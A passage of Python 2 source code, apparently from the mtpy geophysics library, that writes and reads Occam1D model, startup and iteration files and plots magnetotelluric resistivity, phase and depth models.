self.data['res'+pol][1+ii] = self.data['res'+pol][0+ii]*self.data['z'+pol][1+ii].real/np.abs(self.data['z'+pol][0+ii])
for jjj in range(len(self.freq)):
self.data['phase'+pol][1+ii,jjj] =\
mtcc.zerror2r_phi_error(self.data['z'+pol][0+ii,jjj].real,self.data['z'+pol][1+ii,jjj].real,
self.data['z'+pol][0+ii,jjj].imag,self.data['z'+pol][1+ii,jjj].real)[1]
if pol == 'xy':
self.res_te = self.data['resxy']
self.phase_te = self.data['phasexy']
elif pol == 'yx':
self.res_tm = self.data['resyx']
self.phase_tm = self.data['phaseyx']
class Model(object):
"""
read and write the model file fo Occam1D
All depth measurements are in meters.
======================== ==================================================
Attributes Description
======================== ==================================================
_model_fn basename for model file *default* is Model1D
_ss string spacing in model file *default* is 3*' '
_string_fmt format of model layers *default* is '.0f'
air_layer_height height of air layer *default* is 10000
bottom_layer bottom of the model *default* is 50000
itdict dictionary of values from iteration file
iter_fn full path to iteration file
model_depth array of model depths
model_fn full path to model file
model_penalty array of penalties for each model layer
model_preference_penalty array of model preference penalties for each layer
model_prefernce array of preferences for each layer
model_res array of resistivities for each layer
n_layers number of layers in the model
num_params number of parameters to invert for (n_layers+2)
pad_z padding of model at depth *default* is 5 blocks
save_path path to save files
target_depth depth of target to investigate
z1_layer depth of first layer *default* is 10
======================== ==================================================
======================== ==================================================
Methods Description
======================== ==================================================
write_model_file write an Occam1D model file, where depth increases
on a logarithmic scale
read_model_file read an Occam1D model file
read_iter_file read an .iter file output by Occam1D
======================== ==================================================
:Example: ::
>>> #--> make a model file
>>> m1 = occam1d.Model()
>>> m1.write_model_file(save_path=r"/home/occam1d/mt01/TE")
"""
def __init__(self, model_fn=None, **kwargs):
self.model_fn = model_fn
self.iter_fn = None
self.n_layers = kwargs.pop('n_layers', 100)
self.bottom_layer = kwargs.pop('bottom_layer', 50000)
self.target_depth = kwargs.pop('target_layer', 10000)
self.pad_z = kwargs.pop('pad_z', 5)
self.z1_layer = kwargs.pop('z1_layer', 10)
self.air_layer_height = kwargs.pop('zir_layer_height', 10000)
self.save_path = kwargs.pop('save_path', None)
if self.model_fn is not None and self.save_path is None:
self.save_path = os.path.dirname(self.model_fn)
self._ss = ' '*3
self._string_fmt = '.0f'
self._model_fn = 'Model1D'
self.model_res = None
self.model_depth = None
self.model_penalty = None
self.model_prefernce = None
self.model_preference_penalty = None
self.num_params = None
def write_model_file(self,save_path=None, **kwargs):
"""
Makes a 1D model file for Occam1D.
Arguments:
----------
**save_path** :path to save file to, if just path saved as
savepath\model.mod, if None defaults to dirpath
**n_layers** : number of layers
**bottom_layer** : depth of bottom layer in meters
**target_depth** : depth to target under investigation
**pad_z** : padding on bottom of model past target_depth
**z1_layer** : depth of first layer in meters
**air_layer_height** : height of air layers in meters
Returns:
--------
**Occam1D.modelfn** = full path to model file
..Note: This needs to be redone.
:Example: ::
>>> old = occam.Occam1D()
>>> old.make1DModelFile(savepath=r"/home/Occam1D/Line1/Inv1_TE",
>>> nlayers=50,bottomlayer=10000,z1layer=50)
>>> Wrote Model file: /home/Occam1D/Line1/Inv1_TE/Model1D
"""
if save_path is not None:
self.save_path = save_path
if os.path.isdir == False:
os.mkdir(self.save_path)
self.model_fn = os.path.join(self.save_path, self._model_fn)
for key in kwargs.keys():
setattr(self, key, kwargs[key])
#---------create depth layers--------------------
log_z = np.logspace(np.log10(self.z1_layer),
np.log10(self.target_depth-
np.logspace(np.log10(self.z1_layer),
np.log10(self.target_depth),
num=self.n_layers)[-2]),
num=self.n_layers-self.pad_z)
ztarget = np.array([zz-zz%10**np.floor(np.log10(zz)) for zz in
log_z])
log_zpad = np.logspace(np.log10(self.target_depth),
np.log10(self.bottom_layer-
np.logspace(np.log10(self.target_depth),
np.log10(self.bottom_layer),
num=self.pad_z)[-2]),
num=self.pad_z)
zpadding = np.array([zz-zz%10**np.floor(np.log10(zz)) for zz in
log_zpad])
z_nodes = np.append(ztarget, zpadding)
self.model_depth = np.array([z_nodes[:ii+1].sum()
for ii in range(z_nodes.shape[0])])
self.num_params = self.n_layers+2
#make the model file
modfid=open(self.model_fn,'w')
modfid.write('Format: Resistivity1DMod_1.0'+'\n')
modfid.write('#LAYERS: {0}\n'.format(self.num_params))
modfid.write('!Set free values to -1 or ? \n')
modfid.write('!penalize between 1 and 0,'+
'0 allowing jump between layers and 1 smooth. \n' )
modfid.write('!preference is the assumed resistivity on linear scale. \n')
modfid.write('!pref_penalty needs to be put if preference is not 0 [0,1]. \n')
modfid.write('! {0}\n'.format(self._ss.join(['top_depth', 'resistivity',
'penalty','preference',
'pref_penalty'])))
modfid.write(self._ss.join([str(-self.air_layer_height),
'1d12', '0', '0', '0', '!air layer','\n']))
modfid.write(self._ss.join([ '0', '-1', '0', '0', '0',
'!first ground layer', '\n']))
for ll in self.model_depth:
modfid.write(self._ss.join(['{0:{1}}'.format(np.ceil(ll),
self._string_fmt),
'-1','1','0','0','\n']))
modfid.close()
print 'Wrote Model file: {0}'.format(self.model_fn)
def read_model_file(self, model_fn=None):
"""
will read in model 1D file
Arguments:
----------
**modelfn** : full path to model file
Fills attributes:
--------
* model_depth' : depth of model in meters
* model_res : value of resisitivity
* model_penalty : penalty
* model_preference : preference
* model_penalty_preference : preference penalty
:Example: ::
>>> m1 = occam1d.Model()
>>> m1.savepath = r"/home/Occam1D/Line1/Inv1_TE"
>>> m1.read_model_file()
"""
if model_fn is not None:
self.model_fn = model_fn
if self.model_fn is None:
raise IOError('Need to input a model file')
elif os.path.isfile(self.model_fn) == False:
raise IOError('Could not find{0}, check path'.format(self.model_fn))
self._model_fn = os.path.basename(self.model_fn)
self.save_path = os.path.dirname(self.model_fn)
mfid = open(self.model_fn, 'r')
mlines = mfid.readlines()
mfid.close()
mdict = {}
mdict['nparam'] = 0
for key in ['depth', 'res', 'pen', 'pref', 'prefpen']:
mdict[key] = []
for mm, mline in enumerate(mlines):
if mline.find('!') == 0:
pass
elif mline.find(':') >= 0:
mlst = mline.strip().split(':')
mdict[mlst[0]] = mlst[1]
else:
mlst = mline.strip().split()
mdict['depth'].append(float(mlst[0]))
if mlst[1] == '?':
mdict['res'].append(-1)
elif mlst[1] == '1d12':
mdict['res'].append(1.0E12)
else:
try:
mdict['res'].append(float(mlst[1]))
except ValueError:
mdict['res'].append(-1)
mdict['pen'].append(float(mlst[2]))
mdict['pref'].append(float(mlst[3]))
mdict['prefpen'].append(float(mlst[4]))
if mlst[1] == '-1' or mlst[1] == '?':
mdict['nparam'] += 1
#make everything an array
for key in ['depth', 'res', 'pen', 'pref', 'prefpen']:
mdict[key] = np.array(mdict[key])
#create an array with empty columns to put the TE and TM models into
mres = np.zeros((len(mdict['res']),2))
mres[:,0] = mdict['res']
mdict['res'] = mres
#make attributes
self.model_res = mdict['res']
self.model_depth = mdict['depth']
self.model_penalty = mdict['pen']
self.model_prefernce = mdict['pref']
self.model_preference_penalty = mdict['prefpen']
self.num_params = mdict['nparam']
def read_iter_file(self, iter_fn=None, model_fn=None):
"""
read an 1D iteration file
Arguments:
----------
**imode** : mode to read from
Returns:
--------
**Occam1D.itdict** : dictionary with keys of the header:
**model_res** : fills this array with the appropriate
values (0) for data, (1) for model
:Example: ::
>>> m1 = occam1d.Model()
>>> m1.model_fn = r"/home/occam1d/mt01/TE/Model1D"
>>> m1.read_iter_file(r"/home/Occam1D/Inv1_TE/M01TE_15.iter")
"""
if iter_fn is not None:
self.iter_fn = iter_fn
if self.iter_fn is None:
raise IOError('Need to input iteration file')
if model_fn is not None:
self.model_fn = model_fn
if self.model_fn is None:
raise IOError('Need to input a model file')
else:
self.read_model_file()
freeparams = np.where(self.model_res == -1)[0]
ifid = file(self.iter_fn, 'r')
ilines = ifid.readlines()
ifid.close()
self.itdict={}
model=[]
for ii,iline in enumerate(ilines):
if iline.find(':')>=0:
ikey=iline[0:20].strip()
ivalue=iline[20:].split('!')[0].strip()
self.itdict[ikey[:-1]]=ivalue
else:
try:
ilst=iline.strip().split()
for kk in ilst:
model.append(float(kk))
except ValueError:
pass
#put the model values into the model dictionary into the res array
#for easy manipulation and access.
model=np.array(model)
self.model_res[freeparams, 1] = model
class Startup(object):
"""
read and write input files for Occam1D
====================== ====================================================
Attributes Description
====================== ====================================================
_ss string spacing
_startup_fn basename of startup file *default* is OccamStartup1D
data_fn full path to data file
debug_level debug level *default* is 1
description description of inversion for your self
*default* is 1D_Occam_Inv
max_iter maximum number of iterations *default* is 20
model_fn full path to model file
rough_type roughness type *default* is 1
save_path full path to save files to
start_iter first iteration number *default* is 0
start_lagrange starting lagrange number on log scale
*default* is 5
start_misfit starting misfit value *default* is 100
start_rho starting resistivity value (halfspace) in log scale
*default* is 100
start_rough starting roughness (ignored by Occam1D)
*default* is 1E7
startup_fn full path to startup file
target_rms target rms *default* is 1.0
====================== ====================================================
"""
def __init__(self, data_fn=None, model_fn=None, **kwargs):
self.data_fn = data_fn
self.model_fn = model_fn
if self.data_fn is not None:
self.save_path = os.path.dirname(self.data_fn)
elif self.model_fn is not None:
self.save_path = os.path.dirname(self.model_fn)
self.startup_fn = None
self.rough_type = kwargs.pop('rough_type', 1)
self.max_iter = kwargs.pop('max_iter', 20)
self.target_rms = kwargs.pop('target_rms', 1)
self.start_rho = kwargs.pop('start_rho', 100)
self.description = kwargs.pop('description', '1D_Occam_Inv')
self.start_lagrange = kwargs.pop('start_lagrange', 5.0)
self.start_rough = kwargs.pop('start_rough', 1.0E7)
self.debug_level = kwargs.pop('debug_level', 1)
self.start_iter = kwargs.pop('start_iter', 0)
self.start_misfit = kwargs.pop('start_misfit', 100)
self.min_max_bounds = kwargs.pop('min_max_bounds', None)
self.model_step = kwargs.pop('model_step', None)
self._startup_fn = 'OccamStartup1D'
self._ss = ' '*3
def write_startup_file(self, save_path=None, **kwargs):
"""
Make a 1D input file for Occam 1D
Arguments:
---------
**savepath** : full path to save input file to, if just path then
saved as savepath/input
**model_fn** : full path to model file, if None then assumed to be in
savepath/model.mod
**data_fn** : full path to data file, if None then assumed to be
in savepath/TE.dat or TM.dat
**rough_type** : roughness type. *default* = 0
**max_iter** : maximum number of iterations. *default* = 20
**target_rms** : target rms value. *default* = 1.0
**start_rho** : starting resistivity value on linear scale.
*default* = 100
**description** : description of the inversion.
**start_lagrange** : starting Lagrange multiplier for smoothness.
*default* = 5
**start_rough** : starting roughness value. *default* = 1E7
**debuglevel** : something to do with how Fortran debuggs the code
Almost always leave at *default* = 1
**start_iter** : the starting iteration number, handy if the
starting model is from a previous run.
*default* = 0
**start_misfit** : starting misfit value. *default* = 100
Returns:
--------
**Occam1D.inputfn** : full path to input file.
:Example: ::
>>> old = occam.Occam1D()
>>> old.make1DdataFile('MT01',edipath=r"/home/Line1",
>>> savepath=r"/home/Occam1D/Line1/Inv1_TE",
>>> mode='TE')
>>> Wrote Data File: /home/Occam1D/Line1/Inv1_TE/MT01TE.dat
>>>
>>> old.make1DModelFile(savepath=r"/home/Occam1D/Line1/Inv1_TE",
>>> nlayers=50,bottomlayer=10000,z1layer=50)
>>> Wrote Model file: /home/Occam1D/Line1/Inv1_TE/Model1D
>>>
>>> old.make1DInputFile(rhostart=10,targetrms=1.5,maxiter=15)
>>> Wrote Input File: /home/Occam1D/Line1/Inv1_TE/Input1D
"""
if save_path is not None:
self.save_path = save_path
if os.path.isdir(self.save_path) == False:
os.mkdir(self.save_path)
self.startup_fn = os.path.join(self.save_path, self._startup_fn)
#--> read data file
if self.data_fn is None:
raise IOError('Need to input data file name.')
else:
data = Data()
data.read_data_file(self.data_fn)
#--> read model file
if self.model_fn is None:
raise IOError('Need to input model file name.')
else:
model = Model()
model.read_model_file(self.model_fn)
#--> get any keywords
for key in kwargs.keys():
setattr(self, key, kwargs[key])
#--> write input file
infid=open(self.startup_fn,'w')
infid.write('{0:<21}{1}\n'.format('Format:', 'OCCAMITER_FLEX'))
infid.write('{0:<21}{1}\n'.format('Description:', self.description))
infid.write('{0:<21}{1}\n'.format('Model File:',
os.path.basename(self.model_fn)))
infid.write('{0:<21}{1}\n'.format('Data File:',
os.path.basename(self.data_fn)))
infid.write('{0:<21}{1}\n'.format('Date/Time:', time.ctime()))
infid.write('{0:<21}{1}\n'.format('Max Iter:', self.max_iter))
infid.write('{0:<21}{1}\n'.format('Target Misfit:', self.target_rms))
infid.write('{0:<21}{1}\n'.format('Roughness Type:', self.rough_type))
if self.min_max_bounds == None:
infid.write('{0:<21}{1}\n'.format('!Model Bounds:', 'min,max'))
else:
infid.write('{0:<21}{1},{2}\n'.format('Model Bounds:',
self.min_max_bounds[0],
self.min_max_bounds[1]))
if self.model_step == None:
infid.write('{0:<21}{1}\n'.format('!Model Value Steps:',
'stepsize'))
else:
infid.write('{0:<21}{1}\n'.format('Model Value Steps:',
self.model_step))
infid.write('{0:<21}{1}\n'.format('Debug Level:', self.debug_level))
infid.write('{0:<21}{1}\n'.format('Iteration:', self.start_iter))
infid.write('{0:<21}{1}\n'.format('Lagrange Value:', self.start_lagrange))
infid.write('{0:<21}{1}\n'.format('Roughness Value:', self.start_rough))
infid.write('{0:<21}{1}\n'.format('Misfit Value:', self.start_misfit))
infid.write('{0:<21}{1}\n'.format('Misfit Reached:', 0))
infid.write('{0:<21}{1}\n'.format('Param Count:', model.num_params))
for ii in range(model.num_params):
infid.write('{0}{1:.2f}\n'.format(self._ss,
np.log10(self.start_rho)))
infid.close()
print 'Wrote Input File: {0}'.format(self.startup_fn)
def read_startup_file(self, startup_fn):
"""
reads in a 1D input file
Arguments:
---------
**inputfn** : full path to input file
Returns:
--------
**Occam1D.indict** : dictionary with keys following the header and
*'res'* : an array of resistivity values
:Example: ::
>>> old = occam.Occam1d()
>>> old.savepath = r"/home/Occam1D/Line1/Inv1_TE"
>>> old.read1DInputFile()
"""
if startup_fn is not None:
self.startup_fn = startup_fn
if self.startup_fn is None:
raise IOError('Need to input a startup file.')
self._startup_fn = os.path.basename(self.startup_fn)
self.save_path = os.path.dirname(self.startup_fn)
infid = open(self.startup_fn,'r')
ilines = infid.readlines()
infid.close()
self.indict = {}
res = []
#split the keys and values from the header information
for iline in ilines:
if iline.find(':') >= 0:
ikey = iline[0:20].strip()[:-1]
ivalue = iline[20:].split('!')[0].strip()
if ikey.find('!') == 0:
pass
else:
setattr(self, ikey.lower().replace(' ', '_'), ivalue)
self.indict[ikey[:-1]] = ivalue
else:
try:
res.append(float(iline.strip()))
except ValueError:
pass
#make the resistivity array ready for models to be input
self.indict['res']=np.zeros((len(res),3))
self.indict['res'][:,0]=res
class Plot1DResponse(object):
"""
plot the 1D response and model. Plots apparent resisitivity and phase
in different subplots with the model on the far right. You can plot both
TE and TM modes together along with different iterations of the model.
These will be plotted in different colors or shades of gray depneng on
color_scale.
:Example: ::
>>> import mtpy.modeling.occam1d as occam1d
>>> p1 = occam1d.Plot1DResponse(plot_yn='n')
>>> p1.data_te_fn = r"/home/occam1d/mt01/TE/Occam_DataFile_TE.dat"
>>> p1.data_tm_fn = r"/home/occam1d/mt01/TM/Occam_DataFile_TM.dat"
>>> p1.model_fn = r"/home/occam1d/mt01/TE/Model1D"
>>> p1.iter_te_fn = [r"/home/occam1d/mt01/TE/TE_{0}.iter".format(ii)
>>> ... for ii in range(5,10)]
>>> p1.iter_tm_fn = [r"/home/occam1d/mt01/TM/TM_{0}.iter".format(ii)
>>> ... for ii in range(5,10)]
>>> p1.resp_te_fn = [r"/home/occam1d/mt01/TE/TE_{0}.resp".format(ii)
>>> ... for ii in range(5,10)]
>>> p1.resp_tm_fn = [r"/home/occam1d/mt01/TM/TM_{0}.resp".format(ii)
>>> ... for ii in range(5,10)]
>>> p1.plot()
==================== ======================================================
Attributes Description
==================== ======================================================
axm matplotlib.axes instance for model subplot
axp matplotlib.axes instance for phase subplot
axr matplotlib.axes instance for app. res subplot
color_mode [ 'color' | 'bw' ]
cted color of TE data markers
ctem color of TM data markers
ctmd color of TE model markers
ctmm color of TM model markers
data_te_fn full path to data file for TE mode
data_tm_fn full path to data file for TM mode
depth_limits (min, max) limits for depth plot in depth_units
depth_scale [ 'log' | 'linear' ] *default* is linear
depth_units [ 'm' | 'km' ] *default is 'km'
e_capsize capsize of error bars
e_capthick cap thickness of error bars
fig matplotlib.figure instance for plot
fig_dpi resolution in dots-per-inch for figure
fig_num number of figure instance
fig_size size of figure in inches [width, height]
font_size size of axes tick labels, axes labels are +2
grid_alpha transparency of grid
grid_color color of grid
iter_te_fn full path or list of .iter files for TE mode
iter_tm_fn full path or list of .iter files for TM mode
lw width of lines for model
model_fn full path to model file
ms marker size
mted marker for TE data
mtem marker for TM data
mtmd marker for TE model
mtmm marker for TM model
phase_limits (min, max) limits on phase in degrees
phase_major_ticks spacing for major ticks in phase
phase_minor_ticks spacing for minor ticks in phase
plot_yn [ 'y' | 'n' ] plot on instantiation
res_limits limits of resistivity in linear scale
resp_te_fn full path or list of .resp files for TE mode
resp_tm_fn full path or list of .iter files for TM mode
subplot_bottom spacing of subplots from bottom of figure
subplot_hspace height spacing between subplots
subplot_left spacing of subplots from left of figure
subplot_right spacing of subplots from right of figure
subplot_top spacing of subplots from top of figure
subplot_wspace width spacing between subplots
title_str title of plot
==================== ======================================================
"""
def __init__(self, data_te_fn=None, data_tm_fn=None, model_fn=None,
resp_te_fn=None, resp_tm_fn=None, iter_te_fn=None,
iter_tm_fn=None, **kwargs):
self.data_te_fn = data_te_fn
self.data_tm_fn = data_tm_fn
self.model_fn = model_fn
self.resp_te_fn = resp_te_fn
if type(self.resp_te_fn) is not list:
self.resp_te_fn = [self.resp_te_fn]
self.resp_tm_fn = resp_tm_fn
if type(self.resp_tm_fn) is not list:
self.resp_tm_fn = [self.resp_tm_fn]
self.iter_te_fn = iter_te_fn
if type(self.iter_te_fn) is not list:
self.iter_te_fn = [self.iter_te_fn]
self.iter_tm_fn = iter_tm_fn
if type(self.iter_tm_fn) is not list:
self.iter_tm_fn = [self.iter_tm_fn]
self.color_mode = kwargs.pop('color_mode', 'color')
self.ms = kwargs.pop('ms', 1.5)
self.lw = kwargs.pop('lw', .5)
self.ls = kwargs.pop('ls', ':')
self.e_capthick = kwargs.pop('e_capthick', .5)
self.e_capsize = kwargs.pop('e_capsize', 2)
self.phase_major_ticks = kwargs.pop('phase_major_ticks', 10)
self.phase_minor_ticks = kwargs.pop('phase_minor_ticks', 5)
self.grid_color = kwargs.pop('grid_color', (.25, .25, .25))
self.grid_alpha = kwargs.pop('grid_alpha', .3)
#color mode
if self.color_mode == 'color':
#color for data
self.cted = kwargs.pop('cted', (0, 0, 1))
self.ctmd = kwargs.pop('ctmd', (1, 0, 0))
self.mted = kwargs.pop('mted', 's')
self.mtmd = kwargs.pop('mtmd', 'o')
#color for occam2d model
self.ctem = kwargs.pop('ctem', (0, .6, .3))
self.ctmm = kwargs.pop('ctmm', (.9, 0, .8))
self.mtem = kwargs.pop('mtem', '+')
self.mtmm = kwargs.pop('mtmm', '+')
#black and white mode
elif self.color_mode == 'bw':
#color for data
self.cted = kwargs.pop('cted', (0, 0, 0))
self.ctmd = kwargs.pop('ctmd', (0, 0, 0))
self.mted = kwargs.pop('mted', '*')
self.mtmd = kwargs.pop('mtmd', 'v')
#color for occam2d model
self.ctem = kwargs.pop('ctem', (0.6, 0.6, 0.6))
self.ctmm = kwargs.pop('ctmm', (0.6, 0.6, 0.6))
self.mtem = kwargs.pop('mtem', '+')
self.mtmm = kwargs.pop('mtmm', 'x')
self.phase_limits = kwargs.pop('phase_limits', (-5, 95))
self.res_limits = kwargs.pop('res_limits', None)
self.depth_limits = kwargs.pop('depth_limits', None)
self.depth_scale = kwargs.pop('depth_scale', 'linear')
self.depth_units = kwargs.pop('depth_units', 'km')
self.fig_num = kwargs.pop('fig_num', 1)
self.fig_size = kwargs.pop('fig_size', [6, 6])
self.fig_dpi = kwargs.pop('dpi', 300)
self.fig = None
self.axr = None
self.axp = None
self.axm = None
self.subplot_wspace = .25
self.subplot_hspace = .15
self.subplot_right = .92
self.subplot_left = .085
self.subplot_top = .93
self.subplot_bottom = .1
self.font_size = kwargs.pop('font_size', 6)
self.title_str = kwargs.pop('title_str', '')
self.plot_yn = kwargs.pop('plot_yn', 'y')
if self.plot_yn == 'y':
self.plot()
def plot(self):
"""
plot data, response and model
"""
if type(self.resp_te_fn) is not list:
self.resp_te_fn = [self.resp_te_fn]
if type(self.resp_tm_fn) is not list:
self.resp_tm_fn = [self.resp_tm_fn]
if type(self.iter_te_fn) is not list:
self.iter_te_fn = [self.iter_te_fn]
if type(self.iter_tm_fn) is not list:
self.iter_tm_fn = [self.iter_tm_fn]
#make a grid of subplots
gs=gridspec.GridSpec(6, 5, hspace=self.subplot_hspace,
wspace=self.subplot_wspace)
#make a figure
self.fig = plt.figure(self.fig_num, self.fig_size, dpi=self.fig_dpi)
plt.clf()
#set some plot parameters
plt.rcParams['font.size'] = self.font_size
plt.rcParams['figure.subplot.left'] = self.subplot_left
plt.rcParams['figure.subplot.right'] = self.subplot_right
plt.rcParams['figure.subplot.bottom'] = self.subplot_bottom
plt.rcParams['figure.subplot.top'] = self.subplot_top
#subplot resistivity
self.axr = self.fig.add_subplot(gs[:4, :4])
#subplot for phase
self.axp = self.fig.add_subplot(gs[4:,:4], sharex=self.axr)
#subplot for model
self.axm = self.fig.add_subplot(gs[:, 4])
legend_marker_list_te = []
legend_label_list_te = []
legend_marker_list_tm = []
legend_label_list_tm = []
#--> plot data apparent resistivity and phase-------------------------
if self.data_te_fn is not None:
d1 = Data()
d1.read_data_file(self.data_te_fn)
#--> cut out missing data
rxy = np.where(d1.res_te[0] != 0)[0]
#--> TE mode Data
if len(rxy) > 0:
rte = self.axr.errorbar(1./d1.freq[rxy],
d1.res_te[0][rxy],
ls=self.ls,
marker=self.mted,
ms=self.ms,
mfc=self.cted,
mec=self.cted,
color=self.cted,
yerr=d1.res_te[1][rxy],
ecolor=self.cted,
picker=2,
lw=self.lw,
elinewidth=self.lw,
capsize=self.e_capsize,
capthick=self.e_capthick)
legend_marker_list_te.append(rte[0])
legend_label_list_te.append('$Obs_{TE}$')
else:
pass
#--------------------plot phase--------------------------------
#cut out missing data points first
pxy = np.where(d1.phase_te[0]!=0)[0]
#--> TE mode data
if len(pxy) > 0:
self.axp.errorbar(1./d1.freq[pxy],
d1.phase_te[0][pxy],
ls=self.ls,
marker=self.mted,
ms=self.ms,
mfc=self.cted,
mec=self.cted,
color=self.cted,
yerr=d1.phase_te[1][pxy],
ecolor=self.cted,
picker=1,
lw=self.lw,
elinewidth=self.lw,
capsize=self.e_capsize,
capthick=self.e_capthick)
else:
pass
#--> plot tm data------------------------------------------------------
if self.data_tm_fn is not None:
d1 = Data()
d1.read_data_file(self.data_tm_fn)
ryx = np.where(d1.res_tm[0] != 0)[0]
#--> TM mode data
if len(ryx) > 0:
rtm = self.axr.errorbar(1./d1.freq[ryx],
d1.res_tm[0][ryx] ,
ls=self.ls,
marker=self.mtmd,
ms=self.ms,
mfc=self.ctmd,
mec=self.ctmd,
color=self.ctmd,
yerr=d1.res_tm[1][ryx],
ecolor=self.ctmd,
picker=2,
lw=self.lw,
elinewidth=self.lw,
capsize=self.e_capsize,
capthick=self.e_capthick)
legend_marker_list_tm.append(rtm[0])
legend_label_list_tm.append('$Obs_{TM}$')
else:
pass
#--------------------plot phase--------------------------------
#cut out missing data points first
pyx = np.where(d1.phase_tm[0]!=0)[0]
#--> TM mode data
if len(pyx)>0:
self.axp.errorbar(1./d1.freq[pyx],
d1.phase_tm[0][pyx],
ls=self.ls,
marker=self.mtmd,
ms=self.ms,
mfc=self.ctmd,
mec=self.ctmd,
color=self.ctmd,
yerr=d1.phase_tm[1][pyx],
ecolor=self.ctmd,
picker=1,
lw=self.lw,
elinewidth=self.lw,
capsize=self.e_capsize,
capthick=self.e_capthick)
else:
pass
#--> plot model apparent resistivity and phase-------------------------
nr = len(self.resp_te_fn)
for rr, rfn in enumerate(self.resp_te_fn):
if rfn == None:
break
itnum = rfn[-7:-5]
if self.color_mode == 'color':
cxy = (0,.4+float(rr)/(3*nr),0)
elif self.color_mode == 'bw':
cxy = (1-1.25/(rr+2.),1-1.25/(rr+2.),1-1.25/(rr+2.))
d1 = Data()
d1.read_resp_file(rfn, data_fn=self.data_te_fn)
#get non zero data
rxy = np.where(d1.res_te[2] != 0)[0]
#--> TE mode Data
if len(rxy) > 0:
rte = self.axr.errorbar(1./d1.freq[rxy],
d1.res_te[2][rxy],
ls=self.ls,
marker=self.mtem,
ms=self.ms,
mfc=cxy,
mec=cxy,
color=cxy,
yerr=d1.res_te[3][rxy],
ecolor=cxy,
picker=2,
lw=self.lw,
elinewidth=self.lw,
capsize=self.e_capsize,
capthick=self.e_capthick)
legend_marker_list_te.append(rte[0])
legend_label_list_te.append('$Mod_{TE}$'+itnum)
else:
pass
#--------------------plot phase--------------------------------
#cut out missing data points first
#--> data
pxy = np.where(d1.phase_te[2]!=0)[0]
#--> TE mode phase
if len(pxy) > 0:
self.axp.errorbar(1./d1.freq[pxy],
d1.phase_te[2][pxy],
ls=self.ls,
marker=self.mtem,
ms=self.ms,
mfc=cxy,
mec=cxy,
color=cxy,
yerr=d1.phase_te[3][pxy],
ecolor=cxy,
picker=1,
lw=self.lw,
elinewidth=self.lw,
capsize=self.e_capsize,
capthick=self.e_capthick)
else:
pass
#---------------plot TM model response---------------------------------
nr = len(self.resp_tm_fn)
for rr, rfn in enumerate(self.resp_tm_fn):
if rfn == None:
break
itnum = rfn[-7:-5]
if self.color_mode == 'color':
cyx = (.7+float(rr)/(4*nr),.13,.63-float(rr)/(4*nr))
elif self.color_mode == 'bw':
cyx = (1-1.25/(rr+2.),1-1.25/(rr+2.),1-1.25/(rr+2.))
d1 = Data()
d1.read_resp_file(rfn, data_fn=self.data_tm_fn)
ryx = np.where(d1.res_tm[2] != 0)[0]
#--> TM mode model
if len(ryx) > 0:
rtm = self.axr.errorbar(1./d1.freq[ryx],
d1.res_tm[2][ryx] ,
ls=self.ls,
marker=self.mtmm,
ms=self.ms,
mfc=cyx,
mec=cyx,
color=cyx,
yerr=d1.res_tm[3][ryx],
ecolor=cyx,
picker=2,
lw=self.lw,
elinewidth=self.lw,
capsize=self.e_capsize,
capthick=self.e_capthick)
legend_marker_list_tm.append(rtm[0])
legend_label_list_tm.append('$Mod_{TM}$'+itnum)
else:
pass
pyx = np.where(d1.phase_tm[2]!=0)[0]
#--> TM mode model
if len(pyx)>0:
self.axp.errorbar(1./d1.freq[pyx],
d1.phase_tm[0][pyx],
ls=self.ls,
marker=self.mtmm,
ms=self.ms,
mfc=cyx,
mec=cyx,
color=cyx,
yerr=d1.phase_tm[3][pyx],
ecolor=cyx,
picker=1,
lw=self.lw,
elinewidth=self.lw,
capsize=self.e_capsize,
capthick=self.e_capthick)
else:
pass
#--> set axis properties-----------------------------------------------
self.axr.set_xscale('log')
self.axp.set_xscale('log')
self.axr.set_yscale('log')
self.axr.grid(True, alpha=self.grid_alpha, which='both',
color=self.grid_color)
plt.setp(self.axr.xaxis.get_ticklabels(),visible=False)
self.axp.grid(True, alpha=self.grid_alpha, which='both',
color=self.grid_color)
self.axp.yaxis.set_major_locator(MultipleLocator(self.phase_major_ticks))
self.axp.yaxis.set_minor_locator(MultipleLocator(self.phase_minor_ticks))
if self.res_limits is not None:
self.axr.set_ylim(self.res_limits)
self.axp.set_ylim(self.phase_limits)
self.axr.set_ylabel('App. Res. ($\Omega \cdot m$)',
fontdict={'size':self.font_size,'weight':'bold'})
self.axp.set_ylabel('Phase (deg)',
fontdict={'size':self.font_size,'weight':'bold'})
self.axp.set_xlabel('Period (s)',
fontdict={'size':self.font_size,'weight':'bold'})
plt.suptitle(self.title_str,fontsize=self.font_size+2,fontweight='bold')
if legend_marker_list_te == [] or legend_marker_list_tm == []:
num_col = 1
else:
num_col = 2
self.axr.legend(legend_marker_list_te+legend_marker_list_tm,
legend_label_list_te+legend_label_list_tm,
loc=2,markerscale=1,
borderaxespad=.05,
labelspacing=.08,
handletextpad=.15,
borderpad=.05,
ncol=num_col,
prop={'size':self.font_size+1})
#--> plot depth model--------------------------------------------------
if self.model_fn is not None:
#put axis labels on the right side for clarity
self.axm.yaxis.set_label_position('right')
self.axm.yaxis.set_tick_params(left='off', right='on',
labelright='on')
self.axm.yaxis.tick_right()
if self.depth_units == 'km':
dscale = 1000.
else:
dscale = 1.
#--> plot te models
nr = len(self.iter_te_fn)
for ii, ifn in enumerate(self.iter_te_fn):
if ifn == None:
break
if self.color_mode == 'color':
cxy = (0,.4+float(ii)/(3*nr),0)
elif self.color_mode == 'bw':
cxy = (1-1.25/(ii+2.),1-1.25/(ii+2.),1-1.25/(ii+2.))
m1 = Model()
m1.read_iter_file(ifn, self.model_fn)
plot_depth = m1.model_depth[1:]/dscale
plot_model = abs(10**m1.model_res[1:,1])
self.axm.semilogx(plot_model[::-1],
plot_depth[::-1],
ls='steps-',
color=cxy,
lw=self.lw)
#--> plot TM models
nr = len(self.iter_tm_fn)
for ii, ifn in enumerate(self.iter_tm_fn):
if ifn == None:
break
if self.color_mode == 'color':
cyx = (.7+float(ii)/(4*nr),.13,.63-float(ii)/(4*nr))
elif self.color_mode == 'bw':
cyx = (1-1.25/(ii+2.),1-1.25/(ii+2.),1-1.25/(ii+2.))
m1 = Model()
m1.read_iter_file(ifn, self.model_fn)
plot_depth = m1.model_depth[1:]/dscale
plot_model = abs(10**m1.model_res[1:,1])
self.axm.semilogx(plot_model[::-1],
plot_depth[::-1],
ls='steps-',
color=cyx,
lw=self.lw)
m1 = Model()
m1.read_model_file(self.model_fn)
if self.depth_limits == None:
dmin = min(plot_depth)
if dmin == 0:
dmin = 1
dmax = max(plot_depth)
self.depth_limits = (dmin, dmax)
